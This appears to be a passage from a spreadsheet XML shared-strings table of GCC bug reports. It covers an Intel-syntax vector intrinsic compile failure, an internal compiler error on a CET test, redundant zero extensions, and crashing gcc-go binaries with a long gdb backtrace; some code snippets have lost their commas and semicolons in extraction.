void foo(int(I))
void (*bar)(int (*)(int)) = </t>
  </si>
  <si>
    <t>kparz</t>
  </si>
  <si>
    <t>GCC-57807</t>
  </si>
  <si>
    <t>Compile failure with __builtin_ia32_unpcklpd with -masm=intel</t>
  </si>
  <si>
    <t>The following code sample will not compile when -masm=intel is set:
(eg. gcc -masm=intel -c foo.c)
typedef double __v2df __attribute__((__vector_size__(16)))
typedef double __m128d __attribute__((__vector_size__(16) __may_alias__))
__m128d _mm_unpacklo_pd(__m128d __A __m128d __B) {
  return (__m128d)__builtin_ia32_unpcklpd((__v2df)__A (__v2df)__B)
}
It generates movhpd xmm0 XMMWORD PTR [rbp-32] which should be movhpd xmm0 QWORD PTR [rbp-32].</t>
  </si>
  <si>
    <t>jleahy+gcc</t>
  </si>
  <si>
    <t>GCC-83488</t>
  </si>
  <si>
    <t>[8 Regression] ICE on a CET test-case</t>
  </si>
  <si>
    <t>Starting from r253977 we ICE on:
$ gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/cet-rdssp-1.c -mavx5124vnniw
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/cet-rdssp-1.c: In function â€˜testâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/cet-rdssp-1.c:32:1: error: unrecognizable insn:
 }
 ^
(insn 8 7 9 2 (set (reg:DI 87)
        (unspec_volatile:DI [
                (reg:DI 88)
            ] UNSPECV_NOP_RDSSP)) /home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/cet-rdssp-1.c:19 -1
     (nil))
during RTL pass: vregs
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/cet-rdssp-1.c:32:1: internal compiler error: in extract_insn at recog.c:2306
0x5afca1 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:108
0x5afcc0 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:116
0xb1a757 extract_insn(rtx_insn*)
	../../gcc/recog.c:2306
0x8c54cd instantiate_virtual_regs_in_insn
	../../gcc/function.c:1591
0x8c54cd instantiate_virtual_regs
	../../gcc/function.c:1960
0x8c54cd execute
	../../gcc/function.c:2009</t>
  </si>
  <si>
    <t>GCC-50038</t>
  </si>
  <si>
    <t>redundant zero extensions</t>
  </si>
  <si>
    <t>Following code
void t_run_test(int Pelsunsigned char * ImageInPtrunsigned char * ImageOutPtr)                                                                            
{                                                                                                                                                           
        int             i                                                                                                                                  
        unsigned char                   xr xg                                                                                                             
        unsigned char                   xy=0                                                                                                               
                for (i = 0 i &lt; Pels i++)                                                                                                                  
                {                                                                                                                                           
                        xr = *ImageInPtr++                                                                                                                 
                        xg = *ImageInPtr++                                                                                                                 
                        xy = (unsigned char) ((19595*xr + 38470*xg) &gt;&gt; 16)                                                                                                         *ImageOutPtr++ = xy                                                                                                                                }                                                                                                                                           }
Is compiled -O2 with  both   gcc 4.5.1
(Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadalto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux)  
and trunk version 
(Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-languages=c --disable-bootsrap
Thread model: posix
gcc version 4.7.0 20110808 (experimental) (GCC) ) 
to 
         ...
        movzbl  (%rsi) %edi                                                                                                                                
        movzbl  1(%rsi) %eax                                                                                                                               
        movq    %rcx %rsi                                                                                                                                  
        movzbl  %dil %edi  &lt;- redundant                                                                                                                                 
        movzbl  %al %eax   &lt;- redundant                                                                                                                              
        imull   $19595 %edi %edi                                                                                                                          
        imull   $38470 %eax %eax                                                                                                                          
        addl    %edi %eax
        ...
For example icc does
         ...
        movzbl    (%rsi) %ecx                                                                                                                        
        incl      %eax                                                                                                                                
        movzbl    1(%rsi) %r8d                                                                                                                        
        addq      $2 %rsi                                                                                                                             
        imull     $19595 %ecx %r10d                            
        ....
Without unnecessary zero extensions.</t>
  </si>
  <si>
    <t>tocarip.intel</t>
  </si>
  <si>
    <t>GCC-80914</t>
  </si>
  <si>
    <t>gcc-go binaries don't run</t>
  </si>
  <si>
    <t>I can't seem to get gcc-go to work in my builds of GCC and I don't understand why. Here's my build configuration:
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/7.1.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc-multilib/src/gcc/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://www.uplinklabs.net/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --disable-libssp --disable-libstdcxx-pch --disable-libunwind-exceptions --disable-werror --enable-__cxa_atexit --enable-checking=release --enable-clocale=gnu --enable-gnu-indirect-function --enable-gnu-unique-object --enable-install-libiberty --enable-libmpx --enable-linker-build-id --enable-lto --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-isl --with-linker-hash-style=gnu --with-multilib-list=m32m64mx32 --with-system-zlib
Thread model: posix
gcc version 7.1.1 20170529 (GCC)
Whenever I run the gcc-provided 'go' binary I just get this:
$ go.gcc
fatal error: DWARF underflow in .debug_info at 4
runtime stack:
fatal error: DWARF underflow in .debug_info at 4
panic during panic
runtime stack:
Segmentation fault (core dumped)
$
Assuming my GCC build process is doing what it should the go.gcc binary should have debug info and not be stripped and 'file' appears to agree that's the case:
$ file /usr/bin/go.gcc
/usr/bin/go.gcc: ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=4467591638a8ccaebbab3384129ec221295ad6a9 not stripped with debug_info
But based on the DWARF underflow messages I guess the debug information in the binary is somehow broken?
Here's what GDB has to say about it:
$ gdb go.gcc
GNU gdb (GDB) 7.12.1
Copyright (C) 2017 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-pc-linux-gnu.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word...
Reading symbols from go.gcc...done.
(gdb) run
Starting program: /usr/bin/go.gcc 
[Thread debugging using libthread_db enabled]
Using host libthread_db library /usr/lib/libthread_db.so.1.
fatal error: DWARF underflow in .debug_info at 4
runtime stack:
fatal error: DWARF underflow in .debug_info at 4
panic during panic
runtime stack:
Program received signal SIGSEGV Segmentation fault.
__generic_morestack (pframe_size=0x7ffff7fa3250 old_stack=0x7ffff7fa3270 param_size=0) at /build/gcc-multilib/src/gcc/libgcc/generic-morestack.c:573
573     /build/gcc-multilib/src/gcc/libgcc/generic-morestack.c: No such file or directory.
(gdb) bt full
#0  __generic_morestack (pframe_size=0x7ffff7fa3250 old_stack=0x7ffff7fa3270 param_size=0) at /build/gcc-multilib/src/gcc/libgcc/generic-morestack.c:573
        frame_size = 1544
        current = 0x7ffff6e80840 
        pp = 0x7ffff7fa3008
        dynamic = 0x0
        from = 
        to = 
        ret = 
        i = 
        aligned = 
#1  0x00007ffff7314581 in __morestack () at /build/gcc-multilib/src/gcc/libgcc/config/i386/morestack.S:510
No locals.
#2  0x00007ffff7306510 in dwarf_buf_error (buf=buf@entry=0x7ffff7fa34b0 msg=msg@entry=0x7ffff74b777f DWARF underflow) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:380
        b = DWARF underflow in .debug_info at 4 '\000' 
#3  0x00007ffff7306a58 in require (count= buf=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:394
No locals.
#4  advance (buf=0x7ffff7fa34b0 count=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:407
        count = 
        buf = 0x7ffff7fa34b0
#5  0x00007ffff7306b17 in read_uint16 (buf=buf@entry=0x7ffff7fa34b0) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:445
        p = 0x7ffff5778f99 
#6  0x00007ffff7309ab4 in build_address_map (addrs=0x7ffff7fa3450 data=0x7ffff7fa3cd0 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff57a4b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff57bede9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff579bbbc \001 dwarf_info_size=142375 dwarf_info=0x7ffff5778f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:1461
        len = 
        unit_buf = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff5778f95 \001 
          buf = 0x7ffff5778f99  
          left = 1 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7ffff7fa3cd0 
          reported_underflow = 0
        }
        u = 
        unit_data_start = 
        is_dwarf64 = 0
        version = 
        info = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff5778f95 \001 
          buf = 0x7ffff5778f9a  
          left = 142370 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7ffff7fa3cd0 
          reported_underflow = 0
        }
        abbrevs = {
          num_abbrevs = 0 
          abbrevs = 0x0
        }
#7  build_dwarf_data (data=0x7ffff7fa3cd0 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff57a4b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff57bede9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff579bbbc \001 dwarf_line_size=34660 dwarf_line=0x7ffff579c3d3 \001 dwarf_info_size=142375 dwarf_info=0x7ffff5778f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2932
        addrs_vec = {
          vec = {
            base = 0x0 
            size = 0 
            alc = 0
          } 
          count = 0
        }
        addrs = 
        addrs_count = 
        fdata = 
#8  backtrace_dwarf_add (state=state@entry=0x7ffff7fa7000 base_address=base_address@entry=0 dwarf_info=0x7ffff5778f95 \001 dwarf_info_size=142375 dwarf_line=0x7ffff579c3d3 \001 dwarf_line_size=34660 dwarf_abbrev=0x7ffff579bbbc \001 dwarf_abbrev_size=2071 dwarf_ranges=0x7ffff57bede9 \001 dwarf_ranges_size=10767 dwarf_str=0x7ffff57a4b37 \001 dwarf_str_size=20125 is_bigendian=0 error_callback=0x7ffff6e80840  data=0x7ffff7fa3cd0 fileline_fn=0x7ffff7fa3898) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2992
No locals.
#9  0x00007ffff730b4a1 in elf_add (state=state@entry=0x7ffff7fa7000 descriptor=descriptor@entry=3 base_address=base_address@entry=0 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7ffff7fa3cd0 fileline_fn=fileline_fn@entry=0x7ffff7fa3898 found_sym=0x7ffff7fa3890 found_dwarf=0x7ffff7fa3894 exe=1) at /build/gcc-multilib/src/gcc/libbacktrace/elf.c:817
        ehdr_view = {
          data = 0x7ffff7fa1000 
          base = 0x7ffff7fa1000 
          len = 4096
        }
        ehdr = {
          e_ident = {     1 '\001'          } 
          e_type =  
          e_machine =  
          e_version =  
          e_entry =  
          e_phoff =  
          e_shoff =  
          e_flags =  
          e_ehsize =  
          e_phentsize =  
          e_phnum =  
          e_shentsize =  
          e_shnum =  
          e_shstrndx = 
        }
        shoff = 
        shnum = 
        shstrndx = 
        shdrs_view = {
          data = 0x7ffff7fa09c8 
          base = 0x7ffff7fa0000 
          len = 8192
        }
        shdrs_view_valid = 0
        shdrs = 
        shstrhdr = 
        shstr_size = 
        shstr_off = 
        names_view = {
          data = 0x7ffff7f9f7f8 
          base = 0x7ffff7f9f000 
          len = 4096
        }
        names_view_valid = 0
        names = 
        symtab_shndx = 
        dynsym_shndx = 
        i = 
        sections = {{
            offset = 1105813 
            size = 142375 
            data = 0x7ffff5778f95 \001
          } {
            offset = 1250259 
            size = 34660 
            data = 0x7ffff579c3d3 \001
          } {
            offset = 1248188 
            size = 2071 
            data = 0x7ffff579bbbc \001
          } {
            offset = 1392105 
            size = 10767 
            data = 0x7ffff57bede9 \001
          } {
            offset = 1284919 
            size = 20125 
            data = 0x7ffff57a4b37 \001
          }}
        symtab_view = {
          data = 0x7ffff7f7c080 
          base = 0x7ffff7f7c000 
          len = 122880
        }
        symtab_view_valid = 1
        strtab_view = {
          data = 0x7ffff7e58030 
          base = 0x7ffff7e58000 
          len = 122880
        }
        strtab_view_valid = 1
        min_offset = 1105813
        max_offset = 
        debug_view = {
          data = 0x7ffff5778f95 
          base = 0x7ffff5778000 
          len = 303104
        }
        debug_view_valid = 1
#10 0x00007ffff730b947 in backtrace_initialize (state=state@entry=0x7ffff7fa7000 descriptor=3 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7ffff7fa3cd0 fileline_fn=fileline_fn@entry=0x7ffff7fa3930) at /build/gcc-multilib/src/gcc/libbacktrace/elf.c:933
        ret = 
        found_sym = 1
        found_dwarf = 0
        elf_fileline_fn = 0x7ffff730aba0 
        pd = {
          state = 0x7ffff7fa38b0 
          error_callback = 0x479a3d36df4bbb00 
          data = 0x7ffff7fa3c70 
          fileline_fn = 0x0 
          found_sym = 0x1 
          found_dwarf = 0x7ffff7fa3ac0 
          exe_descriptor = -134596144
        }
#11 0x00007ffff730a38a in fileline_initialize (state=0x7ffff7fa7000 error_callback=0x7ffff6e80840  data=0x7ffff7fa3cd0) at /build/gcc-multilib/src/gcc/libbacktrace/fileline.c:136
        fileline_fn = 0x0
        failed = 
        pass = 
        called_error_callback = 0
        descriptor = 
        failed = 
#12 0x00007ffff730a432 in backtrace_pcinfo (state=0x7ffff7fa7000 pc=140737335789816 callback=0x7ffff6e805c0  error_callback=0x7ffff6e80840  data=0x7ffff7fa3cd0) at /build/gcc-multilib/src/gcc/libbacktrace/fileline.c:170
No locals.
#13 0x00007ffff730a9f6 in unwind (context= vdata=0x7ffff7fa3c80) at /build/gcc-multilib/src/gcc/libbacktrace/backtrace.c:91
        bdata = 0x7ffff7fa3c80
        pc = 
        ip_before_insn = 0
#14 0x00007ffff57d2999 in _Unwind_Backtrace (trace=0x7ffff730a950  trace_argument=0x7ffff7fa3c80) at /build/gcc-multilib/src/gcc/libgcc/unwind.inc:295
        fs = {
          regs = {
            reg = {{
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 18446744073709551600 
                  offset = -16 
                  exp = 0xfffffffffffffff0 
                } 
                how = REG_SAVED_OFFSET
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              }  {
                loc = {
                  reg = 18446744073709551608 
                  offset = -8 
                  exp = 0xfffffffffffffff8 
                } 
                how = REG_SAVED_OFFSET
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              }} 
            prev = 0x0 
            cfa_offset = 48 
            cfa_reg = 7 
            cfa_exp = 0x0 
            cfa_how = CFA_REG_OFFSET
          } 
          pc = 0x7ffff6e80915  
          personality = 0x0 
          data_align = -8 
          code_align = 1 
          retaddr_column = 16 
          fde_encoding = 27 '\033' 
          lsda_encoding = 255 '\377' 
          saw_z = 1 '\001' 
          signal_frame = 0 '\000' 
          eh_ptr = 0x0
        }
        context = {
          reg = {0x0 0x0 0x0 0x7ffff7fa3cc0 0x0 0x0 0x7ffff7fa3c70 0x0 0x0 0x0 0x0 0x0 0x7ffff7fa3c50 0x7ffff7fa3c58 0x7ffff7fa3c60 0x7ffff7fa3c68 0x7ffff7fa3cc8 0x0} 
          cfa = 0x7ffff7fa3cd0 
          ra = 0x7ffff6e808f9  
          lsda = 0x0 
          bases = {
            tbase = 0x0 
            dbase = 0x0 
            func = 0x7ffff6e80890 
          } 
          flags = 4611686018427387904 
          version = 0 
          args_size = 0 
          by_value = '\000' 
        }
        code = _URC_NO_REASON
#15 0x00007ffff730aa79 in backtrace_full (state=0x7ffff7fa7000 skip=skip@entry=0 callback=callback@entry=0x7ffff6e805c0  error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7ffff7fa3cd0) at /build/gcc-multilib/src/gcc/libbacktrace/backtrace.c:127
        bdata = {
          skip = 0 
          state = 0x7ffff7fa7000 
          callback = 0x7ffff6e805c0  
          error_callback = 0x7ffff6e80840  
          data = 0x7ffff7fa3cd0 
          ret = 0 
          can_alloc = 1
        }
        p = 
#16 0x00007ffff6e808f9 in runtime_callers (skip= locbuf=locbuf@entry=0x7ffff7fa3d20 m=m@entry=100 keep_thunks=keep_thunks@entry=false) at /build/gcc-multilib/src/gcc/libgo/runtime/go-callers.c:170
        data = {
          locbuf = 0x7ffff7fa3d20 
          skip = 2 
          index = 0 
          max = 100 
          keep_thunks = 0
        }
#17 0x00007ffff7262158 in runtime.traceback (skip=) at /build/gcc-multilib/src/gcc/libgo/go/runtime/traceback_gccgo.go:72
        locbuf = {{
            pc = 0 
            filename = 0x0  
            function = 0x0  
            lineno = 0
          } }
        c = 
#18 0x00007ffff73145c5 in __morestack () at /build/gcc-multilib/src/gcc/libgcc/config/i386/morestack.S:544
No locals.
#19 0x00007ffff72625ec in runtime.dopanic (unused=0) at /build/gcc-multilib/src/gcc/libgo/go/runtime/panic.go:835
        gp = 0x7ffff7dcb2e0 
        level = 2
        all = 
        docrash = false
        _g_ = 
#20 0x00007ffff7269f6a in runtime.startpanic () at /build/gcc-multilib/src/gcc/libgo/go/runtime/panic.go:792
        _g_ = 0x7ffff7dcb2e0 
#21 0x00007ffff7262715 in runtime.throw (s=...) at /build/gcc-multilib/src/gcc/libgo/go/runtime/panic.go:757
        gp = 
#22 0x00007ffff6e8ab9f in runtime_throw (s=s@entry=0x7fffffff9910 DWARF underflow in .debug_info at 4) at /build/gcc-multilib/src/gcc/libgo/runtime/panic.c:13
No locals.
#23 0x00007ffff6e80872 in error_callback (data= msg= errnum=) at /build/gcc-multilib/src/gcc/libgo/runtime/go-callers.c:154
        data = 
        errnum = 
        msg = 0x7fffffff9910 DWARF underflow in .debug_info at 4
#24 0x00007ffff7306510 in dwarf_buf_error (buf=buf@entry=0x7fffffff9b50 msg=msg@entry=0x7ffff74b777f DWARF underflow) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:380
        b = DWARF underflow in .debug_info at 4 '\000' 
#25 0x00007ffff7306a58 in require (count= buf=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:394
No locals.
#26 advance (buf=0x7fffffff9b50 count=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:407
        count = 
        buf = 0x7fffffff9b50
#27 0x00007ffff7306b17 in read_uint16 (buf=buf@entry=0x7fffffff9b50) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:445
        p = 0x7ffff7e76f99 
#28 0x00007ffff7309ab4 in build_address_map (addrs=0x7fffffff9af0 data=0x7fffffffa370 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff7ea2b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff7ebcde9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff7e99bbc \001 dwarf_info_size=142375 dwarf_info=0x7ffff7e76f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:1461
        len = 
        unit_buf = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff7e76f95 \001 
          buf = 0x7ffff7e76f99  
          left = 1 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7fffffffa370 
          reported_underflow = 0
        }
        u = 
        unit_data_start = 
        is_dwarf64 = 0
        version = 
        info = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff7e76f95 \001 
          buf = 0x7ffff7e76f9a  
          left = 142370 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7fffffffa370 
          reported_underflow = 0
        }
        abbrevs = {
          num_abbrevs = 0 
          abbrevs = 0x0
        }
#29 build_dwarf_data (data=0x7fffffffa370 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff7ea2b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff7ebcde9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff7e99bbc \001 dwarf_line_size=34660 dwarf_line=0x7ffff7e9a3d3 \001 dwarf_info_size=142375 dwarf_info=0x7ffff7e76f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2932
        addrs_vec = {
          vec = {
            base = 0x0 
            size = 0 
            alc = 0
          } 
          count = 0
        }
        addrs = 
        addrs_count = 
        fdata = 
#30 backtrace_dwarf_add (state=state@entry=0x7ffff7fa7000 base_address=base_address@entry=0 dwarf_info=0x7ffff7e76f95 \001 dwarf_info_size=142375 dwarf_line=0x7ffff7e9a3d3 \001 dwarf_line_size=34660 dwarf_abbrev=0x7ffff7e99bbc \001 dwarf_abbrev_size=2071 dwarf_ranges=0x7ffff7ebcde9 \001 dwarf_ranges_size=10767 dwarf_str=0x7ffff7ea2b37 \001 dwarf_str_size=20125 is_bigendian=0 error_callback=0x7ffff6e80840  data=0x7fffffffa370 fileline_fn=0x7fffffff9f38) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2992
No locals.
#31 0x00007ffff730b4a1 in elf_add (state=state@entry=0x7ffff7fa7000 descriptor=descriptor@entry=3 base_address=base_address@entry=0 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7fffffffa370 fileline_fn=fileline_fn@entry=0x7fffffff9f38 found_sym=0x7fffffff9f30 found_dwarf=0x7fffffff9f34 exe=1) at /build/gcc-multilib/src/gcc/libbacktrace/elf.c:817
        ehdr_view = {
          data = 0x7ffff7fa4000 
          base = 0x7ffff7fa4000 
          len = 4096
        }
        ehdr = {
          e_ident = {     1 '\001'          } 
          e_type =  
          e_machine =  
          e_version =  
          e_entry =  
          e_phoff =  
          e_shoff =  
          e_flags =  
          e_ehsize =  
          e_phentsize =  
          e_phnum =  
          e_shentsize =  
          e_shnum =  
          e_shstrndx = 
        }
        shoff = 
        shnum = 
        shstrndx = 
        shdrs_view = {
          data = 0x7ffff7fa39c8 
          base = 0x7ffff7fa3000 
          len = 8192
        }
        shdrs_view_valid = 0
        shdrs = 
        shstrhdr = 
        shstr_size = 
        shstr_off = 
        names_view = {
          data = 0x7ffff7fa27f8 
          base = 0x7ffff7fa2000 
          len = 4096
        }
        names_view_valid = 0
        names = 
        symtab_shndx = 
        dynsym_shndx = 
        i = 
        sections = {{
            offset = 1105813 
            size = 142375 
            data = 0x7ffff7e76f95 \001
          } {
            offset = 1250259 
            size = 34660 
            data = 0x7ffff7e9a3d3 \001
          } {
            offset = 1248188 
            size = 2071 
            data = 0x7ffff7e99bbc \001
          } {
            offset = 1392105 
            size = 10767 
            data = 0x7ffff7ebcde9 \001
          } {
            offset = 1284919 
            size = 20125 
            data = 0x7ffff7ea2b37 \001
          }}
        symtab_view = {
          data = 0x7ffff7f7c080 
          base = 0x7ffff7f7c000 
          len = 122880
        }
        symtab_view_valid = 1
        strtab_view = {
          data = 0x7ffff7edb030 
          base = 0x7ffff7edb000 
          len = 122880
        }
        strtab_view_valid = 1
        min_offset = 1105813
        max_offset = 
        debug_view = {
          data = 0x7ffff7e76f95 
          base = 0x7ffff7e76000 
          len = 303104
        }
        debug_view_valid = 1
#32 0x00007ffff730b947 in backtrace_initialize (state=state@entry=0x7ffff7fa7000 descriptor=3 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7fffffffa370 fileline_fn=fileline_fn@entry=0x7fffffff9fd0) at /build/gcc-multilib/src/gcc/libbacktrace/elf.c:933
        ret = 
        found_sym = 1
        found_dwarf = 0
        elf_fileline_fn = 0x7ffff730aba0 
        pd = {
          state = 0x7fffffff9f50 
          error_callback = 0x479a3d36df4bbb00 
          data = 0x7fffffffa310 
          fileline_fn = 0x0 
          found_sym = 0x1 
          found_dwarf = 0x7fffffffa160 
          exe_descriptor = -24464
        }
#33 0x00007ffff730a38a in fileline_initialize (state=0x7ffff7fa7000 error_callback=0x7ffff6e80840  data=0x7fffffffa370) at /build/gcc-multilib/src/gcc/libbacktrace/fileline.c:136
        fileline_fn = 0x0
        failed = 
        pass = 
        called_error_callback = 0
        descriptor = 
        failed = 
#34 0x00007ffff730a432 in backtrace_pcinfo (state=0x7ffff7fa7000 pc=140737335789816 callback=0x7ffff6e805c0  error_callback=0x7ffff6e80840  data=0x7fffffffa370) at /build/gcc-multilib/src/gcc/libbacktrace/fileline.c:170
No locals.
#35 0x00007ffff730a9f6 in unwind (context= vdata=0x7fffffffa320) at /build/gcc-multilib/src/gcc/libbacktrace/backtrace.c:91
        bdata = 0x7fffffffa320
        pc = 
        ip_before_insn = 0
#36 0x00007ffff57d2999 in _Unwind_Backtrace (trace=0x7ffff730a950  trace_argument=0x7fffffffa320) at /build/gcc-multilib/src/gcc/libgcc/unwind.inc:295
        fs = {
          regs = {
            reg = {{
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              } {
                loc = {
                  reg = 18446744073709551600 
                  offset = -16 
                  exp = 0xfffffffffffffff0 
                } 
                how = REG_SAVED_OFFSET
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              }  {
                loc = {
                  reg = 18446744073709551608 
                  offset = -8 
                  exp = 0xfffffffffffffff8 
                } 
                how = REG_SAVED_OFFSET
              } {
                loc = {
                  reg = 0 
                  offset = 0 
                  exp = 0x0
                } 
                how = REG_UNSAVED
              }} 
            prev = 0x0 
            cfa_offset = 48 
            cfa_reg = 7 
            cfa_exp = 0x0 
            cfa_how = CFA_REG_OFFSET
          } 
          pc = 0x7ffff6e80915  
          personality = 0x0 
          data_align = -8 
          code_align = 1 
          retaddr_column = 16 
          fde_encoding = 27 '\033' 
          lsda_encoding = 255 '\377' 
          saw_z = 1 '\001' 
          signal_frame = 0 '\000' 
          eh_ptr = 0x0
        }
        context = {
          reg = {0x0 0x0 0x0 0x7fffffffa360 0x0 0x0 0x7fffffffa310 0x0 0x0 0x0 0x0 0x0 0x7fffffffa2f0 0x7fffffffa2f8 0x7fffffffa300 0x7fffffffa308 0x7fffffffa368 0x0} 
          cfa = 0x7fffffffa370 
          ra = 0x7ffff6e808f9  
          lsda = 0x0 
          bases = {
            tbase = 0x0 
            dbase = 0x0 
            func = 0x7ffff6e80890 
          } 
          flags = 4611686018427387904 
          version = 0 
          args_size = 0 
          by_value = '\000' 
        }
        code = _URC_NO_REASON
#37 0x00007ffff730aa79 in backtrace_full (state=0x7ffff7fa7000 skip=skip@entry=0 callback=callback@entry=0x7ffff6e805c0  error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7fffffffa370) at /build/gcc-multilib/src/gcc/libbacktrace/backtrace.c:127
        bdata = {
          skip = 0 
          state = 0x7ffff7fa7000 
          callback = 0x7ffff6e805c0  
          error_callback = 0x7ffff6e80840  
          data = 0x7fffffffa370 
          ret = 0 
          can_alloc = 1
        }
        p = 
#38 0x00007ffff6e808f9 in runtime_callers (skip= locbuf=locbuf@entry=0x7fffffffa3c0 m=m@entry=100 keep_thunks=keep_thunks@entry=false) at /build/gcc-multilib/src/gcc/libgo/runtime/go-callers.c:170
        data = {
          locbuf = 0x7fffffffa3c0 
          skip = 2 
          index = 0 
          max = 100 
          keep_thunks = 0
        }
#39 0x00007ffff7262158 in runtime.traceback (skip=skip@entry=0) at /build/gcc-multilib/src/gcc/libgo/go/runtime/traceback_gccgo.go:72
        locbuf = {{
            pc = 0 
            filename = 0x0  
            function = 0x0  
            lineno = 0
          } }
        c = 
#40 0x00007ffff72625ec in runtime.dopanic (unused=0) at /build/gcc-multilib/src/gcc/libgo/go/runtime/panic.go:835
        gp = 0x7ffff7dcb2e0 
        level = 2
        all = 
        docrash = false
        _g_ = 
#41 0x00007ffff726271a in runtime.throw (s=...) at /build/gcc-multilib/src/gcc/libgo/go/runtime/panic.go:758
        gp = 
#42 0x00007ffff6e8ab9f in runtime_throw (s=s@entry=0x7fffffffb710 DWARF underflow in .debug_info at 4) at /build/gcc-multilib/src/gcc/libgo/runtime/panic.c:13
No locals.
